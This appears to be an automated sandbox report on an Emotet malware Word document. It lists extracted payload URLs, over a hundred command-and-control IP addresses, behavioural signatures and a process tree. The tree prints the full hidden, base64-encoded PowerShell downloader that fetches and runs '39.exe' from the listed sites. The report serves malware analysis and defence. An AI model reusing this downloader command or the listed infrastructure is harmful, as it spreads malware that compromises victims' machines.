Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
28-01-2020 19:06
General
Malware Config
Extracted
http://earlingramjr.com/wp-admin/jMVDLv8/
http://empower4talent.com/calendar/uf475/
http://emyrs-eg.lehmergroup.com/YaePG8Heh9/
http://expressdocuments.org/egxoii/fO852/
http://fastagindia.hapus.app/cgi-bin/IJ/
Extracted
emotet
70.184.112.55:80
5.34.158.102:80
144.139.91.187:80
12.162.84.2:8080
72.47.209.128:80
74.50.51.115:7080
184.172.27.82:8080
202.62.39.111:80
181.10.204.106:80
91.72.179.214:80
203.130.0.69:80
189.201.197.98:8080
201.213.32.59:80
204.225.249.100:7080
212.71.237.140:8080
94.176.234.118:443
201.213.100.141:8080
31.16.195.72:80
185.94.252.12:80
146.255.96.214:443
139.162.118.88:8080
181.60.244.48:8080
172.104.169.32:8080
99.252.27.6:80
87.106.77.40:7080
2.42.173.240:80
177.188.121.26:443
58.162.218.151:80
93.144.226.57:80
68.183.170.114:8080
81.213.78.151:443
119.59.124.163:8080
185.243.92.42:8080
190.101.144.224:80
190.6.193.152:8080
109.169.86.13:8080
110.170.65.146:80
82.8.232.51:80
203.45.161.179:443
59.120.5.154:80
195.223.215.190:80
216.251.83.79:80
62.75.160.178:8080
188.135.15.49:80
186.15.52.123:80
50.28.51.143:8080
5.196.35.138:7080
190.191.82.216:80
203.25.159.3:8080
72.29.55.174:80
190.24.243.186:80
70.184.69.146:80
62.75.143.100:7080
73.125.15.41:80
190.195.129.227:8090
190.210.236.139:80
144.139.228.113:443
175.114.178.83:443
191.103.76.34:443
152.231.89.226:80
94.200.126.42:80
186.68.48.204:443
77.55.211.77:8080
200.69.224.73:80
79.7.114.1:80
144.139.228.113:80
189.78.156.8:80
151.80.142.33:80
69.163.33.84:8080
73.239.11.159:80
189.19.81.181:443
142.93.114.137:8080
190.100.153.162:443
186.177.165.196:443
94.200.114.162:80
191.183.21.190:80
190.210.184.138:995
68.62.245.148:80
2.45.112.134:80
76.69.26.71:80
186.15.83.52:8080
177.242.21.126:80
46.28.111.142:7080
188.216.24.204:80
200.45.187.90:80
138.68.106.4:7080
82.152.149.79:80
109.166.89.91:80
91.205.215.57:7080
68.174.15.223:80
5.88.27.67:8080
192.241.146.84:8080
177.103.157.126:80
82.196.15.205:8080
91.242.136.103:80
86.42.166.147:80
190.17.44.48:80
113.190.254.245:80
190.70.1.69:80
81.16.1.45:80
118.200.47.120:443
192.241.143.52:8080
186.200.205.170:80
175.139.209.3:8080
200.58.83.179:80
181.29.101.13:8080
89.32.150.160:8080
188.218.104.226:80
151.237.36.220:80
125.99.61.162:7080
181.36.42.205:443
87.106.46.107:8080
91.83.93.124:7080
200.123.183.137:443
79.7.158.208:80
177.103.159.44:80
80.11.158.65:8080
58.171.38.26:80
37.187.6.63:8080
217.199.160.224:8080
91.74.175.46:80
120.150.247.164:80
139.47.135.215:80
129.205.201.163:80
144.139.56.105:80
207.154.204.40:8080
37.120.185.153:443
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4904 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4472 4248 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4472 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
39.exe39.exepid process 4652 39.exe 4632 39.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
39.exepid process 4632 39.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE39.exe39.exepid process 4904 WINWORD.EXE 4652 39.exe 4632 39.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4472 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe39.exedescription pid process target process PID 4472 wrote to memory of 4652 4472 Powershell.exe 39.exe PID 4652 wrote to memory of 4632 4652 39.exe 39.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76288b03aada28f313d41a8856e42320372dfc03b255335b3d8c0427cb01c4a1.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABHAHIAcQBwAGsAaQB1AHkAdAA9ACcAQQByAGYAdgBsAGcAdABrAG8AcgBiAGMAcQAnADsAJABQAHAAcwBoAGgAbgBvAHIAdgBoAHYAcQBvACAAPQAgACcAMwA5ACcAOwAkAE0AbQBxAGMAcgBkAHgAcgBoAHkAaABiAD0AJwBSAHoAYQBpAG4AdwBtAGEAdgBvAHgAZAAnADsAJABJAHUAbAB0AGYAeABkAHgAeQBvAHcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFAAcABzAGgAaABuAG8AcgB2AGgAdgBxAG8AKwAnAC4AZQB4AGUAJwA7ACQARQBvAGEAcABsAG0AaQBsAGMAZQBpAD0AJwBOAG8AbgB6AHIAdAB0AGEAYgBiAGkAbgAnADsAJABOAGwAaQB1AHAAaAB6AHYAeQA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAQgBjAEwAaQBFAG4AVAA7ACQAQgBjAG8AZQB4AHYAZABzAGUAYQBmAD0AJwBoAHQAdABwADoALwAvAGUAYQByAGwAaQBuAGcAcgBhAG0AagByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBqAE0AVgBEAEwAdgA4AC8AKgBoAHQAdABwADoALwAvAGUAbQBwAG8AdwBlAHIANAB0AGEAbABlAG4AdAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AdQBmADQANwA1AC8AKgBoAHQAdABwADoALwAvAGUAbQB5AHIAcwAtAGUAZwAuAGwAZQBoAG0AZQByAGcAcgBvAHUAcAAuAGMAbwBtAC8AWQBhAGUAUABHADgASABlAGgAOQAvACoAaAB0AHQAcAA6AC8ALwBlAHgAcAByAGUAcwBzAGQAbwBjAHUAbQBlAG4AdABzAC4AbwByAGcALwBlAGcAeABvAGkAaQAvAGYATwA4ADUAMgAvACoAaAB0AHQAcAA6AC8ALwBmAGEAcwB0AGEAZwBpAG4AZABpAGEALgBoAGEAcAB1AHMALgBhAHAAcAAvAGMAZwBpAC0AYgBpAG4ALwBJAEoALwAnAC4AIgBzAGAAUABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEwAcgBiAGYAbgB3AGoAbQBzAHkAPQAnAEUAbQBnAHgAdwBhAHAAYwB5AG0AaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwB0AGEAZABlAGoAZABoAHUAawB5AG8AIABpAG4AIAAkAEIAYwBvAGUAeAB2AGQAcwBlAGEAZgApAHsAdAByAHkAewAkAE4AbABpAHUAcABoAHoAdgB5AC4AIgBkAGAATwBXAG4AYABMAGAAbwBBAGQARgBpAEwAZQAiACgAJABDAHQAYQBkAGUAagBkAGgAdQBrAHkAbwAsACAAJABJAHUAbAB0AGYAeABkAHgAeQBvAHcAKQA7ACQASgBuAG4AZABtAHMAYgBpAGQAPQAnAEIAeQB1AGIAawBiAHYAcABoAGIAcABnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQASQB1AGwAdABmAHgAZAB4AHkAbwB3ACkALgAiAEwAYABFAGAATgBnAFQASAAiACAALQBnAGUAIAAzADUANwA3ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAHQAIgAoACQASQB1AGwAdABmAHgAZAB4AHkAbwB3ACkAOwAkAEkAeAB6AGsAeQBqAG0AegBkAD0AJwBKAGYAZwBxAGgAYgBwAG0AdwB4AGYAbwBzACcAOwBiAHIAZQBhAGsAOwAkAFQAaABkAHUAaABzAHkAaABrAGQAaQA9ACcASwBvAHoAcgBzAG8AcwBxAGoAcgB0AG8AcQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABIAGMAaQBoAG4AaABxAGYAdgA9ACcAQwBrAHgAdgBtAHkAaQByACcA1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\39.exe"C:\Users\Admin\39.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\39.exe--93b589303⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\39.exe
-
C:\Users\Admin\39.exe
-
C:\Users\Admin\39.exe
-
memory/4632-13-0x00000000004A0000-0x00000000004B6000-memory.dmpFilesize
88KB
-
memory/4632-14-0x0000000000400000-0x0000000000421000-memory.dmpFilesize
132KB
-
memory/4652-11-0x00000000004B0000-0x00000000004C6000-memory.dmpFilesize
88KB
-
memory/4904-5-0x0000022764961000-0x0000022764964000-memory.dmpFilesize
12KB